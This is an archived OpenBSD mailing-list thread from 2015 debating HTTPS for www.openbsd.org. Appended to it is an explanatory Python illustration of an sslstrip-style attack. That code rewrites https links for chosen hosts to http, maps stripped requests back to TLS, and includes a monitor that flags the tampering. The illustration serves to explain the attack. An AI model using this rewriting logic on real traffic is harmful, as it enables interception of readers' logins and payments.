On 11 December 2015 at 05:37, Anthony J. Bentley <anth...@anjbe.name> wrote:
> "Constantine A. Murenin" writes:
>> On 8 December 2015 at 19:26, Anthony J. Bentley <anth...@anjbe.name> wrote:
>> > Giancarlo Razzolini writes:
>> >> One of the main benefits of the TLS wouldn't only be to render
>> >> impossible for anyone to know which pages you're accessing on the site,
>> >> but also the fact that we would get a little more security getting the
>> >> SSH fingerprints for the anoncvs servers. Having them in clear text as
>> >> they are today, isn't very secure.
>> >
>> > Another attack currently possible against www.openbsd.org is changing
>> > the https://openbsdstore.com links to http://openbsdstore.com, and
>> > running sslstrip on that. Or the PayPal links...
>>
>> For real!  And yet another attack currently possible against
>> www.openbsd.org is being able to view the web-site from any OpenBSD
>> release, even the early ones that did include lynx in base
>> (http://mdoc.su/OpenBSD-2.3/lynx.1), yet are surely missing not only
>> TLSv1.2 (if not OpenSSL in the first place!), but the requisite CA
>> entries in their corresponding cert.pem file as well (that is, if such
>> file was even present).
>
> Why even bring up OpenBSD 2.3? Anyone running that 19 years after its
> release has much bigger problems than not being able to connect to
> www.openbsd.org.

Not really.  It just works.  And there's always time to upgrade to a
newer OpenBSD release, since those continue to be served through http
without any issues.

>
>> And if you're in Kazakhstan, it's also possible to view
>> www.openbsd.org without any issues or security warnings, and will
>> continue being so even after 2016-01-01 when the new telecommunication
>> directive takes force.  (Or was the feature to ignore invalid
>> certificates already added to lynx nowadays?)
>
> I can't tell if you're saying it's a *good* thing that http provides no
> notice that your connection is compromised. Are you serious?

But http connections aren't compromised.  They're just monitored
passively.  (And it's all public data, and, as mentioned, even with
https, the hostnames would still have leaked.)

Since it's impossible to do the same with https, they have to be MitM'ed.

>
> Look, the whole CA model comes with a lot of baggage. Let's Encrypt has
> elements of a new approach but is still tied to that way of thinking.
> Talking on misc@ won't make www.openbsd.org more secure.
>
> But you're defending telnet in 2015.

No.  If you look closely at what Theo has said, especially around
pledge(2), telnet has more problems than just lack of encryption.
Kinda like HTTPS has a few too many downfalls and bad policies other
than the availability of encryption.

C.
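
The link-downgrade attack Anthony describes above (an on-path attacker rewrites
the https:// links in a page served over cleartext HTTP to http://, then relays
each stripped request to the real site over TLS), as an added illustration that
is not code from this thread, from www.openbsd.org, or from sslstrip itself.
The target host list, the sample page, and the function names are constructed
for the example; the last function shows the only kind of check the site side
can run (comparing an observed copy with the canonical one), and why it does
not help a reader elsewhere on the network.

```python
"""
sslstrip-style link downgrade, illustrated (added example, not sslstrip).

Nothing in a page fetched over plain HTTP is authenticated, so an attacker
between the reader and the site can rewrite it in transit: links that point
at HTTPS-only hosts (store, payment processor) become http:// links. When
the reader follows one, the attacker's proxy upgrades its own leg to the
real site over TLS and relays the reader's cleartext. No warning appears
anywhere, because no certificate was ever involved on the reader's side.
"""
import re
from urllib.parse import urlsplit, urlunsplit

# Hosts whose links the attacker chooses to downgrade (constructed list).
TARGET_HOSTS = {"openbsdstore.com", "www.paypal.com"}

# Constructed sample page standing in for a cleartext www page that links
# out to HTTPS-only services.
SAMPLE_PAGE = """<html><body>
<a href="https://openbsdstore.com/">Order CDs</a>
<a href="https://www.openbsd.org/donations.html">Donate</a>
<form action="https://www.paypal.com/cgi-bin/webscr" method="post">
</form>
<a href="http://www.openbsd.org/anoncvs.html">anoncvs</a>
</body></html>"""

# href/action/src attributes whose value is an https:// URL.
_HTTPS_ATTR = re.compile(r'((?:href|action|src)=["\'])(https://[^"\']+)(["\'])')
# Any href/action/src attribute value, for the monitor-side comparison.
_ANY_ATTR = re.compile(r'(?:href|action|src)=["\']([^"\']+)["\']')


def strip_https_links(html, target_hosts=TARGET_HOSTS):
    """Attacker side: rewrite https:// links to the target hosts as http://.

    Returns (rewritten_html, mapping). The mapping takes each downgraded
    http:// URL back to the original https:// URL, which is what the proxy
    needs later to re-upgrade the upstream leg.
    """
    mapping = {}

    def downgrade(match):
        original = match.group(2)
        parts = urlsplit(original)
        if parts.hostname not in target_hosts:
            return match.group(0)  # leave other links untouched
        plain = urlunsplit(("http",) + tuple(parts[1:]))
        mapping[plain] = original
        return match.group(1) + plain + match.group(3)

    return _HTTPS_ATTR.sub(downgrade, html), mapping


def upstream_for(requested_url, mapping):
    """Proxy side: the victim asked for a cleartext URL; fetch the https://
    original so the real site sees an ordinary TLS client."""
    return mapping.get(requested_url, requested_url)


def find_downgraded_links(observed_html, canonical_html):
    """Monitor side: links that are https:// in the canonical page but
    http:// in a copy observed from some network vantage point.

    This only detects tampering as seen from where the monitor sits. A
    reader on another network path has nothing to compare against, which
    is the point of serving the page over HTTPS in the first place.
    """
    canonical = set(_ANY_ATTR.findall(canonical_html))
    downgraded = []
    for url in _ANY_ATTR.findall(observed_html):
        parts = urlsplit(url)
        if parts.scheme != "http":
            continue
        as_https = urlunsplit(("https",) + tuple(parts[1:]))
        if as_https in canonical and url not in canonical:
            downgraded.append(url)
    return downgraded


if __name__ == "__main__":
    rewritten, mapping = strip_https_links(SAMPLE_PAGE)
    print(rewritten)
    print("proxy upgrades", upstream_for("http://openbsdstore.com/", mapping))
    print("monitor flags", find_downgraded_links(rewritten, SAMPLE_PAGE))
```

Only links to the chosen hosts change; the donation link stays https://
because the attacker left it alone, and the anoncvs link was already
cleartext. The monitor reports exactly the two rewritten URLs, and reports
nothing when handed an untouched copy.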
